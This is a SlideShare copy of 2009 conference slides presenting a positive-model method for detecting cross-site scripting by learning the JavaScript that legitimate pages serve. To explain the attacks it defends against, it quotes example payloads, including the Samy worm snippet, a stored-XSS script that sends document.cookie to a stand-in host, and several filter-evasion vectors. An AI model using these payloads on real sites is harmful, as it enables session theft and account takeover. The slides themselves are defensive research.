OWASP Plan - Strawman


Published on

  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide
  • MySpace filter was quite simple and did not stop Samy payload. XSS viruses propagate differently and do not cause wide network saturation that hampers infection rate. Traffic to/form web-server and not between peers.
  • It is worth mentioning that no malicious content is sent by the victim (as opposed to reflected XSS)
  • Input validation Positive security model. check all input for length, type, syntax, and business rules before accepting the data to be displayed or stored. Output encodingescaping " Escaping " is a technique used to ensure that characters are treated as data. Noxes Noxes provides an additional layer of protection that existing personal firewall do not support. a web proxy that fetches HTTP requests on behalf of the user’s browser. all web connections of the browser pass through Noxes and can either be blocked or allowed based on the current security policy.
  • OWASP Plan - Strawman

    1. 1. A new approach to XSS Detection using JavaScript Modeling Ofer Rotberg [email_address] David Movshovitz [email_address] IDC September 2009
    2. 2. Agenda <ul><li>Background and Motivation </li></ul><ul><li>Current Solutions…and drawbacks </li></ul><ul><li>Our Approach </li></ul><ul><li>Evaluation and Results </li></ul><ul><li>Conclusion & Further Work </li></ul>
    3. 3. Standards (?) <ul><li>HTTP </li></ul><ul><ul><li>Stateless </li></ul></ul><ul><ul><li>GET, POST </li></ul></ul><ul><li>HTML </li></ul><ul><ul><li>Blends together code (e.g., JavaScript, Flash) & data . </li></ul></ul><ul><ul><li>4 prevailing HTML rendering implementations: </li></ul></ul><ul><ul><ul><li>Trident (MSHTML) - used in MSIE6, MSIE7, MSIE8. </li></ul></ul></ul><ul><ul><ul><li>Gecko - used in Firefox and derivates. </li></ul></ul></ul><ul><ul><ul><li>WebKit - used by Safari, Chrome, Android. </li></ul></ul></ul><ul><ul><ul><li>Presto - used in Opera. </li></ul></ul></ul><ul><ul><li>Different “ forgiving policy ” among implementations. </li></ul></ul>
    4. 4. Web Application Vulnerabilities Source:IBM Internet Security Systems X-Force® 2008 Trend & Risk Report
    5. 5. Closer Look Source: “WhiteHat Website Security Statistic Reports”, Dec 2008
    6. 6. Attackers Prefer the Application Layer <ul><li>The application layer is the weakest link – no generic defense mechanism. </li></ul><ul><li>The application layer leads the attacker directly to the data . </li></ul><ul><li>A plethora of freely available web applications. </li></ul><ul><li>Very simple to perform. </li></ul><ul><li>Every input has the potential to be an attack vector. </li></ul><ul><li>In order to (really) fix must change code (On average, 60 days to repair XSS vulnerability). </li></ul>
    7. 7. MySpace.com virus (a.k.a Samy worm) <ul><li>Date : October 5, 2005. </li></ul><ul><li>Target : force users to become my friends. </li></ul><ul><li>Samy inserted raw HTML into his profile. </li></ul><ul><ul><li><div id=&quot;mycode&quot; expr=&quot;alert('hah!')&quot; style=&quot;background:url('java script:eval(document.all.mycode.expr)')&quot;> </li></ul></ul><ul><li>The payload adds Samy to visitor’s friends and copy itself to visitor’s profile. </li></ul><ul><li>MySpace was forced to shutdown its website, fix the vulnerability, and perform clean up. </li></ul>Source: XSS WORMS AND VIRUSES The Impending Threat and the Best Defense, APRIL 2006 , Jeremiah Grossman.
    8. 8. XSS in Details <ul><li>Three known types: </li></ul><ul><ul><li>Reflected (Non-Persistent) </li></ul></ul><ul><ul><li>Stored (Persistent) </li></ul></ul><ul><ul><li>DOM Based (Local) </li></ul></ul><ul><li>The target is to run hostile JavaScript on the victims browser. </li></ul><ul><li>JavaScript malware can: </li></ul><ul><ul><li>Steal Cookie </li></ul></ul><ul><ul><li>Map internal networks </li></ul></ul><ul><ul><li>Spread like a worm </li></ul></ul><ul><ul><li>… </li></ul></ul>
    9. 9. Reflected XSS <ul><li>Request </li></ul><ul><ul><li>http://www.website.com/ index.php?name=Jim </li></ul></ul><ul><li>Response </li></ul><ul><ul><li><html> </li></ul></ul><ul><ul><ul><li><body> </li></ul></ul></ul><ul><ul><ul><li>Hello, Jim </li></ul></ul></ul><ul><ul><ul><li>... </li></ul></ul></ul><ul><li>Request </li></ul><ul><ul><li>http://www.website.com/index.php?name=Jim<script>alert(&quot;XSS&quot;)</script> </li></ul></ul><ul><li>Response </li></ul><ul><ul><li><html> </li></ul></ul><ul><ul><ul><li><body> </li></ul></ul></ul><ul><ul><ul><ul><li>Hello, Jim </li></ul></ul></ul></ul><ul><ul><ul><ul><li><script>alert(&quot;XSS&quot;)</script> </li></ul></ul></ul></ul><ul><ul><ul><ul><li>... </li></ul></ul></ul></ul><ul><li>Browser – assumes server doesn’t send malicious content </li></ul><ul><ul><li>Parse HTML – build DOM </li></ul></ul><ul><ul><li>Fetch resources and execute them. </li></ul></ul>
    10. 10. Stored XSS
    11. 11. Stored XSS <ul><li>Trudy posts the following text on a message board: </li></ul><ul><ul><ul><li>Great message! </li></ul></ul></ul><ul><ul><ul><li><script> </li></ul></ul></ul><ul><ul><ul><ul><li>var img=new Image(); </li></ul></ul></ul></ul><ul><ul><ul><ul><li>img.src= &quot;http://www.bad.com/CookieStealer/Form1.aspx?s= &quot;+document.cookie; </li></ul></ul></ul></ul><ul><ul><ul><li></script> </li></ul></ul></ul><ul><li>When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy </li></ul>
    12. 12. DOM-Based XSS <ul><li>First published by Amit Klein (http://www.webappsec.org/projects/articles/071105.shtml) </li></ul><ul><li>http://victim/promo?product_id=100&title= Last+Chance </li></ul><ul><li>http://victim/promo?product_id=100&title= Foo#<SCRIPT>alert('XSS') </SCRIPT> </li></ul><ul><ul><li><script> </li></ul></ul><ul><ul><ul><ul><li>var url = window.location.href; </li></ul></ul></ul></ul><ul><ul><ul><ul><li>var pos = url.indexOf(&quot;title=&quot;) + 6; </li></ul></ul></ul></ul><ul><ul><ul><ul><li>var len = url.length; </li></ul></ul></ul></ul><ul><ul><ul><ul><li>var title_string = url.substring(pos,len); </li></ul></ul></ul></ul><ul><ul><ul><ul><li>document.write(title_string); </li></ul></ul></ul></ul><ul><ul><li></script> </li></ul></ul>pos len Last Chance ! xss
    13. 13. Current Solutions <ul><li>XSS is a sub-problem of Insufficient Input Validation. </li></ul><ul><li>Server-Side Application </li></ul><ul><ul><li>Static/Dynamic code analysis (white box) </li></ul></ul><ul><ul><li>Web application scanners (black box) </li></ul></ul><ul><li>Server-Side Proxy </li></ul><ul><ul><li>Input validation </li></ul></ul><ul><ul><li>EscapingOutput encoding (‘<‘  &lt) </li></ul></ul><ul><ul><li>HTTP-request anomaly detection </li></ul></ul><ul><li>Client-Side </li></ul><ul><ul><li>Disable JS. </li></ul></ul><ul><ul><li>Noxes - a web proxy that fetches HTTP requests and can either block or allow based on current security policy. </li></ul></ul>
    14. 14. Problems with current solutions <ul><li>Escaping - </li></ul><ul><ul><li>Good practice ! But, </li></ul></ul><ul><ul><li>Many web-application permit and return HTML tags (<b>, <ul>…) </li></ul></ul><ul><ul><li>What about URI scheme like javascript: </li></ul></ul><ul><li>Blacklisting (negative logic) is difficult </li></ul><ul><ul><li><SCRIPT/SRC=&quot;http://ha.ckers.org/xss.js&quot;></SCRIPT> </li></ul></ul><ul><ul><li><IMG SRC=&quot;javascript:alert('XSS');&quot;> </li></ul></ul><ul><ul><li><BODY ONLOAD=alert('XSS')> </li></ul></ul><ul><ul><li>… and 100+ more attack vectors in RSnake’s XSS Cheatsheet . </li></ul></ul><ul><ul><li>An effective filter must also ensure that is does not introduces new scripts </li></ul></ul><ul><ul><ul><li>Before: <img src=&quot;. . . &quot; target=&quot; onload=&quot;malicious script&quot;> </li></ul></ul></ul><ul><ul><ul><li>After: <img src=&quot;. . . &quot; onload=&quot;malicious script&quot;> </li></ul></ul></ul>
    15. 15. Problems with current solutions (cont.) <ul><li>Focusing only on HTTP-request is problematic </li></ul><ul><ul><li>Even if an attack was detected, it doesn’t mean it will actually occur (false positive). </li></ul></ul><ul><ul><li>What about Stored XSS attacks ? </li></ul></ul><ul><li>Client-side solutions </li></ul><ul><ul><li>Deployment </li></ul></ul><ul><ul><li>Browser modifications/integration. </li></ul></ul>
    16. 16. Problems with current solutions (cont.) GET http://bank.com/main.php?uName=Jack <ul><li>Main() </li></ul><ul><li>echo (“<SCRIPT>”) </li></ul><ul><li>echo (“Document.write( </li></ul><ul><li>“ Hello” + $uName);”) </li></ul><ul><li>echo (“</SCRIPT> </li></ul>Hello Jack <script> Document.write(“Hello” + “Jack”); </script>
    17. 17. Problems with current solutions (cont.) GET http://bank.com/main.php?uName=Jack ”);alert(‘xss!’) <ul><li>Main() </li></ul><ul><li>echo (“<SCRIPT>”) </li></ul><ul><li>echo (“Document.write( </li></ul><ul><li>“ Hello” + $uName);”) </li></ul><ul><li>echo (“</SCRIPT> </li></ul>Hello Jack <script> Document.write(“Hello” + “Jack ”); alert(‘xss’) ; </script> xss!
    18. 18. Our Approach <ul><li>Positive security logic </li></ul><ul><ul><li>Anything is illegal unless known to be legal </li></ul></ul><ul><li>Focus on HTTP response </li></ul><ul><li>Model – code-script elements in HTML web-pages </li></ul><ul><ul><li>Assumption: the set of all instances of code-script elements is bounded and can be learned in a relative short period. </li></ul></ul><ul><ul><li>1st try – JavaScript code is static. </li></ul></ul><ul><ul><li>2nd try – JavaScript code is static under some transformation. </li></ul></ul>
    19. 19. Detector Architecture
    20. 20. X SS Attack Detection <ul><li>Learning mode </li></ul><ul><ul><li>For each extracted JS: </li></ul></ul><ul><ul><ul><li>Learn regular form. </li></ul></ul></ul><ul><ul><ul><li>Learn canonicalized form. </li></ul></ul></ul><ul><ul><li>Three concerns </li></ul></ul><ul><ul><ul><li>Coverage </li></ul></ul></ul><ul><ul><ul><li>Updating </li></ul></ul></ul><ul><ul><ul><ul><li>Deploy detector in testing environment. </li></ul></ul></ul></ul><ul><ul><ul><ul><li>Perform deeper inspection. </li></ul></ul></ul></ul><ul><ul><ul><li>Learning data-set should be with no malicious JS </li></ul></ul></ul><ul><li>Detection mode </li></ul><ul><ul><li>For each unknown JS do: </li></ul></ul><ul><ul><ul><li>Further inspection. </li></ul></ul></ul><ul><ul><ul><li>Strip out </li></ul></ul></ul><ul><ul><ul><li>Inform web-admin </li></ul></ul></ul>
    21. 21. Deployment options <ul><li>Web proxy </li></ul><ul><ul><li>Protect a single web-application </li></ul></ul><ul><li>Integration with the browser </li></ul><ul><ul><li>JS extraction is done by browser. </li></ul></ul><ul><ul><li>Defend against DOM-based XSS. </li></ul></ul><ul><ul><li>Improved performance. </li></ul></ul>Web Application Web Proxy Client
    22. 22. Evaluation Methodology <ul><li>FP </li></ul><ul><ul><li>Choose top-ranked 40 web-application. </li></ul></ul><ul><ul><li>Crawl each web application </li></ul></ul><ul><ul><li>Learn each web-page & build code-elements DB </li></ul></ul><ul><ul><li>Perform 2 tests: </li></ul></ul><ul><ul><ul><li>Convergence test: #pages to needed to learn all JS. </li></ul></ul></ul><ul><ul><ul><li>FP test: FP = (#pages causing alarm)/(#pages). </li></ul></ul></ul><ul><li>FN </li></ul><ul><ul><li>Test detector against RSnake’s cheat-sheet. </li></ul></ul><ul><ul><li>Choose vulnerable application from xssed.com </li></ul></ul><ul><ul><li>Generate benign-input and attack-input. </li></ul></ul><ul><ul><li>Learn with benign. </li></ul></ul><ul><ul><li>Detect with attack. Each result was also checked manually. </li></ul></ul>
    23. 23. Results <ul><li>Zero FP </li></ul><ul><li>FN – all attacks were detected. </li></ul>
    24. 24. Conclusion <ul><li>Zero FP under canonicalization </li></ul><ul><li>Generic - targets all types of XSS </li></ul><ul><ul><li>Even DOM-Based could be mitigated if web proxy is deployed on client side. </li></ul></ul><ul><li>Fast convergence – short learning period </li></ul><ul><ul><li>Number of canonicalized JS nodes is bounded. </li></ul></ul><ul><ul><li>Most JS nodes appear in every page (“building blocks”). </li></ul></ul>
    25. 25. Thanx ! Ofer Rotberg IDC [email_address] September 2009
    26. 26. Some More Related Work <ul><li>Vulnerability analysis: find vulnerable source-sink pairs e.g., saner: Livshits et al. Usenix 2005, Pixy N. Jovanovic et al. S&P2006, Y. Xie et al. Usenix 2006, D. Balzarotti et al. CCS 2007... </li></ul><ul><ul><ul><li>Useful but limited to detection </li></ul></ul></ul><ul><li>Server side solutions: filter based or track taint & disallow at sink : W . Xu et al. Usenix 2006, … </li></ul><ul><ul><ul><li>Centralized defense but do not know all scripts </li></ul></ul></ul><ul><li>Client side solutions: Firewall like mechanisms to prevent malicious actions at client </li></ul><ul><ul><ul><li>Noxes E. Kirda, et al. SAC 2006, P. Vogt et al. NDSS 2007 </li></ul></ul></ul><ul><ul><ul><li>User controlled protection but do not know intended scripts </li></ul></ul></ul><ul><li>Client-Server collaborative solutions: Clients enforce application specified policies </li></ul><ul><ul><ul><li>BEEP T. Jim, et al. WWW 2007, Tahoma R. Cox et al. S&P 2006, Browsershield C. Reis et al. OSDI 2006 </li></ul></ul></ul><ul><ul><ul><li>Can determine intended and all scripts but deployment issues </li></ul></ul></ul>